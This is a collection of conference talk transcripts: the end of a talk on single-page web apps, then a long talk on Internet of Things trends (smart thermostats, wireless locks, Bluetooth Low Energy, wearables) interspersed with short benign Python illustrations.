It would have fallen down on itself and it would not have been maintainable. So data binding is, at the moment, the most promising future that we have, and it's definitely made things easier. I won't go into this, but download the slides; you can see the difference between the three eras here. Data binding is the way that we are writing JavaScript now. I'm going to skip to the end here. Does building a spa even make sense? Well, not if you have proprietary business logic that you would have to put down on the client, or very little interactivity, or if fast initial page load is what really matters; then it's probably the wrong approach. It can also be a real pain to debug. There are a lot of downsides to doing single-page development. So if you don't need to, then I don't recommend doing it. You really need to be able to justify that a spa is the right approach. Now there are some good reasons why, though. It's very responsive; you can really get awesome interactivity. You can separate your concerns. And it's very, very simple. There are fewer abstractions in some ways over the code, because you're sending down the real-deal HTML. And you don't have to worry about compiling, too; that's one really nice thing. If you have an application with a really slow build time... I didn't have to pay any of that price, because I was just playing in plain JavaScript. It's just save and reload, save and reload. So we built this very, very quickly. And ultimately, don't single-page all the things. That's the wrong mindset, right? What we need to think about is pockets of single-page applications. Look at your whole app and go: is there a place within this app where a single-page app makes sense? Our application is almost exclusively plain old Web Forms from way back when, but this is a pocket of single-page application where we really thought it made sense. That's it. I'll be glad to take questions. Just come on up and visit.
There's a few Pluralsight cards left. Thanks for listening. Thank you. Thank you.
Typical technology sessions walk through a trivial example application to give you a taste of the technology. So hey, let’s do the opposite! In this session we’ll dissect a highly complex single page application that's soon to be used by over 1,000 automotive dealerships to finance and sell cars. This is an HTML5 application that our Silverlight guys said couldn’t be built. We’ll walk through how to manage a pure client-side application with thousands of lines of custom JavaScript and review how Web API, Knockout, Durandal, RequireJS, KendoUI, and surprisingly little jQuery can join forces to make the browser sing. You’ll gain a clear understanding of when a single page app approach makes sense and learn how to pragmatically divide responsibilities between the client and server. And we’ll close out by comparing the performance of complex web apps in modern browsers to older versions of Internet Explorer. This session will give you an appreciation for how far you can push ultra-responsive client-side rendering in the real-world.
10.5446/50590 (DOI)
All right. Good morning and welcome to the session. So today I'm just going to give you a brief insight into the thing that we call the Internet of Things. So people are sometimes sure what they're talking about when they say Internet of Things. Sometimes they're not. It's actually a little fuzzy most of the time. And I would actually contend that nobody really knows what they're talking about when they say Internet of Things. But they do know that, hey, this is something, this is going to change our lives. This is going to change how we're doing business. This is going to change how we are interacting with people. They really sense that change. This is like the wind which is blowing: you really don't understand where it's coming from, where it's going to, but you know that you're right there in the middle of it. So looking back on the Internet itself, obviously, a lot of you people over here have been brought up with the Internet. So when you started going to work or to school, you actually had the Internet there with you. But before that, when the Internet really started disrupting things, it started with disrupting commerce, online stores. So you see Amazon, you see a lot of industries which have been disrupted. Amazon was with respect to selling of books. You started getting disruption in the telecom space, the way you're going to call people, the way you're going to build relationships, messaging, and a whole bunch of stuff that the Internet has disrupted. So it's really disrupting every facet of our lives. The way we interact with people, the way we interact with things, it's doing something quite different. So when I really got into the Internet, it was when I was at work. I had no clue what this thing was when I was in Bidra Govindaya or at high school.
So this was like a mind-blowing thing, that you could actually send email to people half a world away and be able to communicate with people whom you really never knew. So I was there in the first chat rooms with the Netscape Navigator browser, and whenever you wanted to send a message, you had to refresh the screen; the screen would refresh and then you would be able to talk to those people. You had no idea who they were. Of course, today the Internet has changed; you pretty much know who they are. So there's this little comic strip that said, hey, in 1993, nobody knows that you're a dog when you're accessing the Internet. In 2010, everybody in the world knows that you're a dog. So it's changing, and it keeps changing. So this is something that we would like to get a handle on, but I suspect that it's going to change a lot of our things and we would not truly be in control. But what I'm really going to give you is a bunch of insight which we see in the semiconductor business, which I've been working in since I started working, that's, I suppose, a couple of decades ago, and we see things before they hit the market. So we know trends, because these things have to happen before they hit mainstream: you need to make the processors, you need to make the chips, you need to make sure that the customers who are going to deliver these things are done before it hits mainstream. So we see trends which you don't, because the numbers are happening, the things are changing before they come to you. So we get a different kind of insight compared to somebody who's actually looking at, you know, deployment numbers, looking at how many people are visiting these things, how many users you have; those things are usually much further down the lane, because things which we see as significant would become significant in the real world maybe eight months later, maybe a year later.
So these are some things that we have understood in the semiconductor business at Nordic Semiconductor when we're looking at this thing called the Internet of Things. Is it affecting our business? Absolutely. This is the elephant in the room. This is definitely affecting our business. And the good news is it's affecting it positively. But we'll try to understand how this is happening. So Amazon, in its initial days, was basically somebody seeing, huh, this Internet thing is going to disrupt a lot of stuff. So I'm going to put up a store. I need to understand. So Jeff Bezos is really trying to understand what's going on. He's seeing things happening. He's seeing, look, these things are going to change. It's definitely going to change things. So what can I leverage out of it? So he's sitting in his Wall Street office, and because he's seeing it from the financial business, he's seeing, ah, this is definitely going to change. So what can I leverage in the first place? The first thing that he understood was selling of books, CDs and things which had high demand. And you can see the things over there, the books, the music, the videos. Of course you had auctions on Amazon at that point of time because he thought auctions were a good thing. You could try that as well, right? But you can see that the traction really happened for the first three, and Amazon today dominates the book retail business. Good thing or bad thing is a different story. But an insight which was seen by somebody 20 years ago, in 1994, has built them into a position of dominance. So every time things change and you get an insight, there is opportunity. Now that was the web, and the web continues to disrupt every industry. So be it, ah, we have the marriage business in India, you know, and that operates a little differently.
There's a movie in, if you've heard of it, it's called Fiddler on the Roof and the song goes matchmaker, matchmaker, make me a match, find me a find and catch me a catch. Look through your books and find me a perfect match. And today, the perfect match and the matchmaker doesn't exist or it's been largely been replaced by matrimony sites. Okay. In the western world you have dating sites where people have to, you know, take the initiative to actually go ahead, find out whom to meet and again the internet has disrupted that space and in the traditional matchmaker space that, you know, I know this person, I know this family, that's a good girl and that's a good guy is being disrupted by matrimonial sites which actually try to match how would this person be a good fit for this person? Yes, for whatever logic that they follow for that. So it's disrupting everything and then we see, okay, and as you have talked about today, everybody's saying, oh, mobile, mobile is going to change everything now. All the people, you're going to get closer, it's going to become different. So yes, mobile is changing things but it's really part of the internet. It's not really any different, it's just a different manifestation of it. However, the semiconductor industry is heavily involved in this. These phones which you see would not have been possible if you could not cram a processor into that tiny little space. It would not have been possible if we didn't manage to run this on a battery which fits in the palm of your hand for a couple of days. It would not have been possible if we didn't allow any set of peripherals to be added to these things. So all of these things, we have a golden rule typically. If you're going to have a device which is there, like a mouse or a keyboard and it's battery powered, it needs to run for at least a year before you change batteries because one year people forget. Anything less than that, they would remember. 
In the phone set, if you initially started how the phones really started working, you know, you had these huge car phones which were there. And now we have this. But everything is really driven by advances in semiconductors. So if you're able to cram more stuff into it and we're able to see that, hey, people want these things, we would continue to go on that path. This path has already started. So the things that you had at desktop, we're going to see this in Amazon. You were watching this on a desktop computer, right? You have the same computing power on your phone today. An ASIC, the processor in an iPhone today is desktop grade. It's a 64-bit processor. It's desktop grade. It's really sitting inside your phone. You're really carrying a computer with you. It's created this ability to do things and you could process local information. You don't have to wait until it gets you to get to your desk to see what has happened. Everything is really changing. And this is not any different. I mean, it's just the same pathway of change that the internet is really disrupting more and more of these things. Of course, we see this example of Uber, which is changing the taxi cab industry. Whether they like it or not, the change is coming to them, kicking and screaming. So it's hard. So sometimes these things would make change, but the only thing is change which is constant. It could be good change. It could be bad change. That's something which is very difficult to control at that point. But all we are going to see is this thing of desktop to mobile phone, what next? Right? So reimagining day to day activity, everything is really work is being reimagined, money is being reimagined, relationships are how you get into a relationship is being reimagined. Books, calling your mom, booking your hotel room, everything is really changing. So that means this is actually creating a lot of opportunity for people who can see the opportunity. Right? 
So that means these things today, I mean, so I've run two startups before. So when I did the first one in 1999, it was hard to get a phone line in India. So I ran the startup in the city of Bangalore and we wanted to get a phone line. So we had to plonk down 2000 crowns, make a dozen calls, go to the office of the telephone guy and try to get a phone line. The fun part is, after we got the phone line, when you picked up the telephone, you wouldn't get a dial tone. Of course, most of you guys wouldn't know what a dial tone is. But that's the amount of change that the internet has really brought into the business, because most of the cellular infrastructure here, which we have today and which we take for granted, is really running on an internet backplane. So things have changed. But the key difference is the cost of doing these things or changing these things has been reducing. Computing cost has been going down. So what was a big barrier to business earlier has been shrinking. So today you have the same computing power which you had on a desktop on your phone. So things are changing. So where is this going to take us? So it's changing the way we interact with things. And I'm going to show you some examples of where this trend has started already, where you see that more and more inanimate objects are also changing. So one thing is for sure, person-to-person relationships, or the way people communicate person-to-person, have definitely changed. So all of that is ripe for disruption. So your Facebook, your one-on-one communication with WhatsApp or Snapchat, all of that is really changing anything that you do. So that's typical. So most web businesses, if you see today, would actually try to do that. Like Basecamp is managing projects. That's managing people. Okay, great. Then you have, you know, messaging applications which help you manage your team.
And in the web, if you see a Web 2.0 application, most of these things are really people interaction. So people interact with the web. The app comes up, you interact with the app. But some things are going to change a little differently. Meaning inanimate objects, things which you just control, a light switch, a thermostat, your doors, your windows, all of these are going to get disrupted. And that's simply being driven by semiconductor advancements, by which we're going to be able to deliver chips which do these things cheaper. They're going to consume less power than ever. They're going to be smaller than ever. You're going to be able to stick them in anything. People are already swallowing these things. That was research a couple of years ago; today the chips are so cheap that you could just sort of swallow one and it's okay. You can just write off the few dollars that, you know, you need to lose when these things go through you. And then it's bio waste, it goes to be recycled or taken care of. So things are becoming cheaper. So that means it's going to touch everything today. I'm just going to show you one thing which has really changed. In 2009, the Energy Star rating for programmable thermostats was revoked. So if you see Energy Star, it's been there for a long time. It's a method by which people say, hey, is your monitor Energy Star compliant? That means, is it saving power when it's sleeping? Is it working in an energy efficient way? So programmable thermostats lost their Energy Star rating. I mean, you could say, how in the world did this happen? Like, I'm going to reduce my energy consumption, so I can program it to say, hey, Monday I'm at work, so in the day you can cut off the heat, and when I come back you can slowly ramp up the heat. It didn't work. So it was a good thought. It didn't work. Most of the time people either forgot to do it, or the interfaces were incredibly bad.
So another learning that we have seen is in the web. You saw Amazon's webpage earlier, that is so retro, right? Today you can do A/B testing, you can look at long copy, short copy. What's going to make a big difference? What doesn't? Are these guys going to click that button if the button is yellow or if the button is green? What kind of text should we have over there? Should we say sign up now? Or should we say don't let your customer get away, click now? Right? So there are lots of ways in which people have been experimenting with the web. Some of that has really rubbed off on other spaces. So, number one: intelligence. These things know you better than you know yourself. What you see in the web is also true here. People know some things about you better than yourself. It's a scary thought. That's the truth. Analytics knows more about your preferences, what you like, what you dislike, than you do. Because they have data, you don't. So it actually creates an opportunity in the device space. So basically the world around you can actually learn without you telling it what to do. I don't need a programmable thermostat where I need to do the programming. We'll learn. We'll know when you're away, we'll know when you're in, we'll know when to cut the power. We'll know when you're going to come in, we'll know when to start ramping up cooling or heating or whatever. We don't need your input. We would be invisible. But we would have the intelligence to serve you. So some of these things, we say, hey, it doesn't matter. Right? The problem was we don't do a good job of actually telling things, or communicating this to a thermostat, or sometimes to people who work with us, sometimes how we communicate. A lot of these things, there's something which is not easily captured. User interfaces help us get over a lot of these things. So good user interfaces have been brought in.
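To make that A/B testing idea concrete, here is a minimal sketch (my own illustration, not any particular site's system) of how a visitor can be deterministically assigned to a button variant, so the same user always sees the same colour across visits:

```python
import hashlib

def ab_bucket(user_id: str, experiment: str,
              variants=("yellow", "green")) -> str:
    """Deterministically assign a user to a variant by hashing the
    user id together with the experiment name. Same inputs always
    give the same bucket, so results stay consistent per visitor."""
    digest = hashlib.sha256(f"{experiment}:{user_id}".encode()).hexdigest()
    return variants[int(digest, 16) % len(variants)]

# The same user lands in the same bucket on every visit:
assert ab_bucket("user-42", "signup-button") == ab_bucket("user-42", "signup-button")
```

Hashing rather than random assignment is the usual trick: no per-user state needs to be stored, yet the split stays stable while you compare click-through rates between the buckets.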
And that's something which has really impacted how these things were going to work together with us. Of course, it also is important that to drive these good user interfaces, it did require some threshold of computing power before this was possible. So in the next case, the specific case, here's a learning thermostat. It's got a bunch of sensors which tell you whether you're in the house, out of the house. It has internet connectivity, so you could actually manage it from different places. But it has a very nice user interface by which things, by which you interact, is very familiar. You're not pressing buttons. It works in the same way as you would do a knob, changing it up or changing it down. It has a very interesting way by which you can actually connect it to your Wi-Fi. Now, connecting it to a Wi-Fi network anywhere is an interesting process, right? Because you go to select the base station and you're going to give it a password hum. This guy doesn't even have one user interface to do something like that. So they actually had a very interesting way to do it on this thing. But of course, with the raise of the mobile, you could do a lot of these things on the mobile phone. So a lot of these things which require setup can be done on the phone. You want to give somebody internet access? Sure. Set it up on the phone. Send the settings to the device. You're done. So these things are actually changing the way you interact because earlier, if you had a dumb device, setting it up was a pain. I remember configuring little devices by putting in UART ports or plugging a PC into it, sending some commands. Configuring a DSL modem was hard because you had to telnet into it and then you had to set some stuff. But today, you don't have to do that. You can set up everything on your mobile phone. Send the settings down to the device. You're done. User interfaces are going to make a huge difference when we're going to change this, when we're going to interact with devices. 
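That set-it-up-on-the-phone flow can be sketched roughly as below. The payload format and field names here are invented purely for illustration; real products define their own provisioning protocols, for example vendor-specific Bluetooth LE services:

```python
import json

def build_provisioning_message(ssid: str, password: str) -> bytes:
    """What the phone app would do: pack the Wi-Fi credentials into a
    small payload to send over a local link. Field names are made up."""
    return json.dumps({"ssid": ssid, "psk": password}).encode("utf-8")

def apply_provisioning(payload: bytes) -> dict:
    """What the headless device would do on receipt: parse the payload
    and hand the settings to its network stack (here just returned)."""
    settings = json.loads(payload.decode("utf-8"))
    return {"ssid": settings["ssid"], "psk": settings["psk"]}

# Phone side builds the message, device side applies it:
msg = build_provisioning_message("HomeNet", "secret123")
cfg = apply_provisioning(msg)
```

The point of the pattern is exactly what the talk describes: the device itself never needs a keyboard or screen, because the phone carries the user interface and just hands the settings down.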
Meaning they're going to be so easy that they're going to seduce us and take over our lives. Very, very easy. The power of defaults, they would know the default. Anyway. Now, this is a very interesting thing. The way you do business is also changing. So you're looking at this and say, hey, how is Nest making money? Look, in the semiconductor business, we don't care much if you're going to buy 10,000 of my chips. Okay, that's nice. We really pay attention only when you're going to talk to me about a million units. That's when people pay attention, because that's something that's happening. So that means we really need to be able to make this device stuff a successful thing. And I'm actually going to show you what's really happening with Nest. Nest is not just making money when they sell you a device, sell you a thermostat. That makes them some money. They're actually also making money by allowing utility companies to control your environment. Okay, so that means Nest gets paid when you sign up to their Rush Hour Rewards program: if there is a peak load coming up, that means the temperature is really increasing, there's a heat wave, you're going to turn on your air con, and everybody in that region is going to turn on the air con at the same time, which is going to create a peak load. So when a peak load happens, you have additional power plants which are kept offline, and then you need to bring them online. So that means there's a sudden jump in the number of power plants which are consuming fuel, which costs a couple of billion dollars in the United States. So Nest said, hey, that's an opportunity. If you sign up and tell the utility company, okay, you can cut off my air con during rush hours, during the maximum heat, they'd pay you some money. But who would do that? I mean, normally you can't even take advantage of this opportunity, right?
You can't go and tell, even if the electricity company had a program and you would say on my honor that I would actually go and switch off my air con even if there is a heat wave coming up, if there's opportunity to make this happen, it doesn't even exist. This is value created out of thin air, right? This is something which just because we had this device controlling your air con and heating that you could now cut a deal with Nest and your electricity company to say, hey, I agree. I'm going to let you cut off my air con when the temperature is going through the roof, meaning it's 30 degrees or 35 degrees and I'm going to let you cut this off. So how would you agree to that, right? So Nest says, look, I'm going to pre-cool your house so that when the rush hour hits you, when there is a peak load and you don't have your air conditioning on, I would actually pre-cool you on a non-rush hour rate or a non-rush hour time so that your house is cooler and when the heat wave is there or the rush hour is there, you don't need to have any cooling. So he says, it works both ways. I can take care of you and I can take care of the energy company and Nest receives part of the benefits and passes on some of the benefits to you. So look at this. This is not really something which is straightforward, right? It's not like, oh, I buy something and I pay for it. It's not direct value transfer. This is different. This is saying somebody can control your life and to mutual benefit, we would actually have a way that this is actually happening through an intelligent device. So today, if during the rush hour, if you go and say, oh my god, this is too hot for me, I'm going to make the cooler, then the Nest knows that during this hour, you actually lowered the temperature so you don't get the reward. So business models for these things is against something which is going to be very interesting to look at. More stuff. We have hotel industries. They were being disrupted. 
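The pre-cool-then-hold scheme described above can be sketched as a toy decision rule. This is my own simplification for illustration, not Nest's actual algorithm:

```python
def thermostat_action(hour: int, peak_hours: range, enrolled: bool,
                      indoor_temp: float, setpoint: float) -> str:
    """Toy decision rule for a peak-load rewards scheme:
    pre-cool just before the peak window on cheap power,
    hold the AC off during the window, otherwise cool normally."""
    if enrolled and hour == peak_hours.start - 1:
        return "pre-cool"          # cool below setpoint before the event
    if enrolled and hour in peak_hours:
        return "hold"              # AC stays off during the peak event
    if indoor_temp > setpoint:
        return "cool"              # normal thermostat behaviour
    return "idle"

peak = range(16, 19)               # assume a 4pm-7pm peak-load window
print(thermostat_action(15, peak, True, 26.0, 24.0))   # pre-cool
print(thermostat_action(17, peak, True, 27.0, 24.0))   # hold
```

Notice how the mutual benefit falls out of four lines of logic: the utility avoids spinning up a peaking plant, and the homeowner rides through the event on the pre-cooled house.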
So you want to book a hotel. You know what you do? You go to TripAdvisor, you go to hotels.com, you look at all the reviews that are there. You get a feeling of whether this is a good hotel or a bad hotel. You look at the worst reviews and say, is this guy biased or was it just a mistake by the hotel? You take a look at it, you make a judgment, and then you choose a hotel, right? Earlier you would use a travel agent or somebody. Now those people were disintermediated a long time ago, in the beginning of the internet. You still have use for travel agents, but the space has shrunk. Now we have Airbnb. That's disrupting the hotel industry, meaning you're bringing property into the business which didn't exist earlier. Of course, again, is this a good thing or a bad thing? I'm not commenting on that. The change is on us, whether we like it or not. The interesting part for us, of course, is that it's actually driving adoption of wireless locks. Now we really see a lot of spaces. Look, we have Mesh in Oslo. We have Diggs in Trondheim. We have a lot of business places where, when I'm traveling, I would like to have some quiet space for some time. I don't really need a hotel room. I need a few hours. I have a long layover between flights, or I'm in a city where I need to talk to a client. I have a few hours and then I say, hey, I would like to have some time and I need to get some work done, but I don't want to be sitting in a hotel. That's one place where you see unattended access to these properties, managed by Airbnb and a lot of other websites which are there, things like Breather. And places like Mesh, access to Mesh, would actually be managed by a central directory. I can synchronize with my Outlook and that guy's Outlook. You could actually sync up to say, hey, I'm reserving this two-hour slot. Then what do you do? You get a call on your phone saying, this is the code to access.
You go there, punch in the code, voila, you're in. You've actually taken that out. The next part is, okay, you're renting out a room, you're renting out something. You need to get that cleaned, right? Who lets in the cleaning lady? Does she have keys to all of these places? No, you can schedule that as well. This is actually inverting that industry, really enabling that industry to actually go further than what had to. We have this co-working space in Trondheim and it's called Diggs. Before they set up their lock management system, they had keys for everybody. They're like 40, 50 keys hanging around with lots of people, impossible to manage. You can't let in the right people. You don't know who went in, who went out. These things are changing the way, so you could actually push codes to people. You can revoke the codes. It's actually enabling this change. This is the internet changing things and the internet of things changing this further. The things which are there, like locks, thermostats, we see clear direction over there. I'll tell you why more things are going to follow. This is a slope. It's already, it's just on the path already. The portable computer with internet access, that's really your phone. The bicycle of the mind, well, that's really a term which was, which the first Macintosh should have had. It was supposed to be a bicycle of the mind, a computer is really a bicycle of the mind. But now you have this thing to assist you everywhere. Great. Now you have computational power. That's raw computational power. You can go and look up stuff. You have internet access on it. But now this guy, A, can act as an intelligent hub for the devices around you. So that means intelligence is on the phone. He looks at all the data around you and you make decisions and makes decisions on your behalf. 
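The push-a-code, revoke-a-code flow for those wireless locks can be sketched like this. The code derivation and field names are purely illustrative; real lock platforms generate and distribute codes their own way:

```python
from datetime import datetime

def issue_code(booking_id: int, start: datetime, end: datetime) -> dict:
    """Issue a door code tied to a booking window, e.g. the two-hour
    slot you reserved, or the cleaning lady's scheduled visit.
    The code derivation below is a placeholder for illustration."""
    code = f"{(booking_id * 7919) % 1000000:06d}"   # illustrative only
    return {"code": code, "start": start, "end": end, "revoked": False}

def code_valid(grant: dict, now: datetime) -> bool:
    """The lock accepts a code only inside its window and if not revoked."""
    return (not grant["revoked"]) and grant["start"] <= now <= grant["end"]

# A booking from 9:00 to 11:00 gets its own code:
g = issue_code(12, datetime(2024, 1, 1, 9), datetime(2024, 1, 1, 11))
```

This is what replaces the 40 or 50 physical keys: every grant is time-boxed, individually revocable, and leaves a record of who was let in when.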
So you're not really consulted to it because once the infrastructure is in place, it believes that it would work in your benefit for the infrastructure to make the decisions. That's interesting and scary. One more thing was that the iPhone really changed things. It really changed things was you had a great computer in your hand, but it sucked. It sucked big time. So I've been in the industry before the iPhone. So you had the Palm OS, you had the pocket PC, you had Blackberry. Those are the devices by which you interacted. And you could do limited things. So that means the business is focused on, okay, you can do email, you can do limited internet, you can do calendar. So if you looked at a Palm OS device from a long time ago, it had four buttons. It said, yes, you can do notes, you can do reminders, you can do contacts, you can do emails. So that's four buttons for it. That's it. So computers or mobile devices on that day were very specific or very targeted, but the iPhone really changed it in which computational power was sufficient to make a big deal out of user interfaces. So user interfaces like touching the screen are really computer intensive and battery intensive as well. So these things, it was really something which said, look, things are going to change. So this is truly, I would say, the first computer which was accessible to do a lot of stuff. Now that's interesting. So where do we see these devices? Now we have a lot of these devices. And you saw that the thermostat was there. Where does the thermostat get its power? He's going to do Wi-Fi. He's going to do internet access. How in the world did he do that? The way he did it was to steal power from thermostat wires. So the lines by which he could control the furnace and the aircon were powered lines. So the thermostat was stealing a little bit of juice from it and keeping his internal battery charged so that he could have his UI, his Wi-Fi, everything running without any problem. 
But that really creates a problem because you're restricted to devices which are connected to the mains or have some power attachment. So one thing which technology is doing today is driving power consumption lower. So how low is low? Low enough that you can have a solar panel powered inside the house with ambient light. So you can use that with enough power to carry over when there is no light. So that's the kind of power numbers that we're talking about. So it's really small batteries. And the advantage is it really puts these, you can put these devices in everything. So we see things like people are putting them in forks. I mean, why in the world would a fork want to be an internet of things? Or what in the world are these people doing? Well, I don't know. But it's possible. And sometimes people try to say, hey, are you eating a lot of these things? How fast are you eating? How slow are you eating? Because the speed of eating apparently tries to tell you whether you're feeling full quickly or whether you will eat more. So apparently if you eat slowly, then you get full with less amount of stuff getting in. So that means your intake is reduced. Well, that's apparently what the fork does. It tells you the weight, the rate of eating. Interesting. Maybe that's a specific segment which cares about that. Well, I don't know. But the point is that it actually is enabling things which you could not really imagine. And I wouldn't have imagined these things because, oh, my God, we need a big battery to deal with these things. No, we don't. So today things are changing. So anything really can get onto the internet via the phone. That's one thing. You could get onto the internet via a gateway in your house which can be your Wi-Fi router itself which has Bluetooth. So this change was driven by Nokia. 
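A rough back-of-the-envelope check for that indoor-solar scenario: does the energy harvested per day cover what the device consumes per day? The numbers below are illustrative assumptions, not measurements of any real product, and a real design would also model storage losses:

```python
def harvest_sustainable(panel_uw: float, light_hours: float,
                        avg_current_ua: float, supply_v: float = 3.0) -> bool:
    """Check whether ambient-light harvesting covers a sensor's daily
    energy budget. panel_uw: panel output in microwatts while lit;
    avg_current_ua: device's average current draw in microamps."""
    harvested_uwh = panel_uw * light_hours          # energy in per day (uWh)
    consumed_uwh = avg_current_ua * supply_v * 24   # energy out per day (uWh)
    return harvested_uwh >= consumed_uwh

# e.g. a 100 uW indoor panel lit 10 h/day vs a device averaging 10 uA at 3 V:
print(harvest_sustainable(100, 10, 10))
```

With numbers in this range (1000 uWh harvested against roughly 720 uWh consumed) the device runs indefinitely, which is exactly why average current in the microamp range is the figure the whole industry chases.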
So Nokia really said, when Nokia was the king of the road before the iPhone, they had the vision and the insight to say, hey, we want something to connect to our phones which doesn't kill the battery on our phone, plus it can run on really, really small batteries for a very, very long time. So that's the vision which Nokia had. And they came to us, because we've been working in this 2.4 GHz space for a long time, which was proprietary. So we said, hey, let's work together. So we worked together for some time. We realized, and we also agreed, that look, it makes sense to move it into a standards body. So we actually went to the Bluetooth SIG and said, hey, we have this technology. We'd like to make it a standard. We're going to give it royalty-free to everybody. Everybody can leverage this. And since this is a standard, I'm not going to screw you, you're not going to screw me, everybody's going to be on the same standard. Then we can build more things. Remember, semiconductors, we need to sell millions. Tens of thousands, hundreds of thousands are nice. We need to sell millions. So the point is, enabling million-chip markets is good. So that means standards are good for us. We like to do that because it takes away the fear from people's minds that I'm going to get locked to this vendor. Oh, this is a great guy, but what if he goes out of business? What happens if I don't get his chips? What happens if the supply chain has a problem? What happens, what happens? All of that is there. So standards-based stuff has always been a strong driver of growth in the industry. Whether it be the GSM cellular standard, which Scandinavia and Norway specifically have contributed a lot to, or internet standards, IP, which has driven the web, and today with low-power connectivity we see Bluetooth leading the way. In any case, it provides autonomy of devices. Small batteries with no need to go to the mains really drive a lot of autonomy.
You could do things which you could not do earlier. You could also power it by motion, by walking. That's enough power to drive these things for like hundreds of milliseconds. It doesn't have to be there all the time. That's something which we need to understand when we say the internet is coming to these things as well. But I think IP addresses, I like to ping my IP addresses, I like to do management of IP addresses. It's not true 100% of the time. You know that Skype had to change its architecture because people were using more of it on the mobile phone and they centralized it because there are lots of other rumors about why they did it as well. So Skype, if you know Skype, is a VoIP calling infrastructure. It was using a peer-to-peer connection. That's good. But it peer-to-peer works. If everybody is on the internet, if everybody is desktop grade, then you can do peer-to-peer. Suddenly what happened when these mobile phones started coming, people would be on the internet for some time and then they'll plonk out. So oops, I can't use that P2P node. Oh, that super node was not supposed to be used as a super node because it turned out to be an iPhone and not a PC. Problem, right? So they adapted that they centralized everything. So basically it said peer-to-peer doesn't work for us, but let's centralize it. And since the infrastructure is robust enough, that was okay. So the same thing has to happen. So when you're going to work with these devices with small batteries which are available for short periods of time, the ability to manage these devices and work with the internet at the same time is gold. The next one is to say, hey, I told you that, look, adding intelligence to your app, so your app will make decisions. Adding intelligence to the clouds, the cloud will make decisions. It's already happening. Some of those things are like your thermostat. 
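For those devices that are only on the air in brief bursts, the battery-life arithmetic looks roughly like this idealized sketch. It ignores battery self-discharge, temperature, and peak-current effects, so treat the numbers as ballpark only:

```python
def battery_life_days(capacity_mah: float, sleep_ua: float,
                      active_ma: float, active_ms: float,
                      interval_s: float) -> float:
    """Estimate battery life for a duty-cycled device, e.g. a low-power
    radio sensor that wakes briefly every interval_s seconds.
    sleep_ua: sleep current in uA; active_ma: awake current in mA."""
    duty = (active_ms / 1000.0) / interval_s             # fraction of time awake
    avg_ma = active_ma * duty + (sleep_ua / 1000.0) * (1 - duty)
    return capacity_mah / avg_ma / 24.0                  # hours -> days

# Illustrative numbers: a ~220 mAh coin cell, 1 uA sleep,
# 10 mA for 3 ms once per second:
print(round(battery_life_days(220, 1, 10, 3, 1.0)))
```

Two things fall out of the formula: sleep current dominates once the bursts are short enough, and stretching the wake-up interval buys battery life almost linearly, which is why that one-year golden rule is achievable on a coin cell at all.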
And we see today that in Bluetooth, for example, among the things which use very little power, we see a couple of categories. Beacons, which show you certain things, which tell you position information, which give you hints about what is happening at a certain point at a certain time. And wearables. So a wearable can tell you whether you're sleeping. So you're looking at a TV, and basically the Netflix guys did this for a summer project or a hackathon or whatever. They actually created something by which they could track your Fitbit and say you have fallen asleep in front of the TV, or the Netflix stream, and they will pause the movie right over there. Amazing. But remember that. This is something that just happens. Did you do it? Did you ask them to do it? They just did it, right? So it's possible that these things would provide you defaults which are a lot nicer to you. They actually take care of your behavior. Maybe you like to fall asleep in front of the TV with the TV running. So every time it does this, oh, you wake up and you go to the bedroom. That behavior would actually get noticed and it would actually modify its behavior. It's possible for them to do that, because it knows that every time I did this, you wouldn't continue to sleep, you woke up. The data is already there, right? So all of this information is providing intelligence to these apps. It's really giving you something which could not have been there before. Contextual information. Of course, this is personal and private information as well. But this is there to serve you. So that's the whole point. To make a better default. So remember, the way we work is we are susceptible to a few things. For example, if anybody says free, we are dead. We're just going to do that free thing, whatever that free thing is. Free email, free web mail, free shipping. That's going to kill us one of these days. But that's what we are.
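That fell-asleep-in-front-of-the-TV trick can be sketched as a simple threshold on wearable motion data. This is a pure illustration of the idea, not the actual Netflix hack:

```python
def fell_asleep(movement_counts: list, window: int = 10,
                threshold: int = 2) -> bool:
    """Guess from per-minute wearable motion counts whether the viewer
    has dozed off: if movement stays below `threshold` for `window`
    consecutive minutes, signal the player to pause playback.
    Window and threshold values are illustrative assumptions."""
    if len(movement_counts) < window:
        return False
    return all(c < threshold for c in movement_counts[-window:])

# Someone fidgeting stays "awake"; ten quiet minutes triggers the pause:
print(fell_asleep([5, 3, 4, 6, 2, 5, 4, 3, 6, 5]))
print(fell_asleep([5, 3, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0]))
```

The interesting part is how little it takes: the wearable already streams the data, so the "intelligence" is just a default rule sitting between two devices that were never designed to talk to each other.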
The minute somebody says free, we just do it. I don't know what it is. We just do that thing. So, a better default for us. The defaults are powerful. Everywhere, whether you have a web app or something, there's the checkbox which says I agree to — when you sign up, I agree that I will receive newsletters from all over the world, from all our partner companies, and I will have no way to unsubscribe from them. Yes, that would be the default. So the defaults are powerful. So what these intelligent devices, and the intelligence that we see happening, are for is to make a better default for your life. That the lights go off and save you power, save you money. That you actually can contribute to, or take advantage of, programs or providers which are trying to make the world a better place. For example, the power companies do not want additional power plants to go online, because that's inefficient for them and it's a horrible thing for the environment as well. So it's both ways. So it's really a better default. We want to bring about a better default. So today we see beacons, wearables like Fitbits, things like Tile, that's really small stuff. You stick it to anything. So you can actually make anything an Internet of Things device today, because you can take this tiny little device and stick it on anything, whatever. Now, what value you get out of it, that's a different problem. Yeah, Bluetooth could also do 6LoWPAN, sure, but it doesn't matter. The whole thing doesn't matter at this point. The point is that the advantage would be there for anybody or any company who can work with devices which are going to be on the Internet for brief, short bursts. So you could actually figure out what to do, what not to do, from those devices, get the information that you want, manage them well, manage the power well, and they give you better defaults. They give intelligence to your app. So that's what's going to make sense.
6LoWPAN, IPv6: they're going to come, sure. But the advantage is already there for people who can manage power better, and the opportunity is today. You don't have to wait for things. That's one of our parts, and it's really tiny stuff. It's like a sliver of silicon sitting over there. So silicon's not really the problem. You look at the size of the battery, and you look at the size of the silicon: who's winning over there? It's the battery which is bigger. So size considerations are not about the chips anymore. Look at the battery: you open up your iPhone, it's battery. A gigantic, hulking, huge battery. Battery is where it's lagging. Battery technology is lagging. You want to make tons of money? Sure, fix that technology. Everybody knows that. How are we going to do this? So we see a lot of these things happening. Technology makes it possible. We see initial traction in a bunch of markets. We're already seeing those trends happening. But if you're going to take this to the next level, remember: this is going to disrupt everything. Like it or not, it's going to disrupt everything. So there's an opportunity over there. But the world of finding what can be done has changed. When I did my couple of startups earlier, I wrote business plans. I wrote these huge pages and pages of stuff which promised investors: oh, this is going to ramp like this, we're going to make this much money, our users are going to be this many people. All bullshit. Because I had no fucking clue. I mean, I knew this was good stuff. But how in the world was 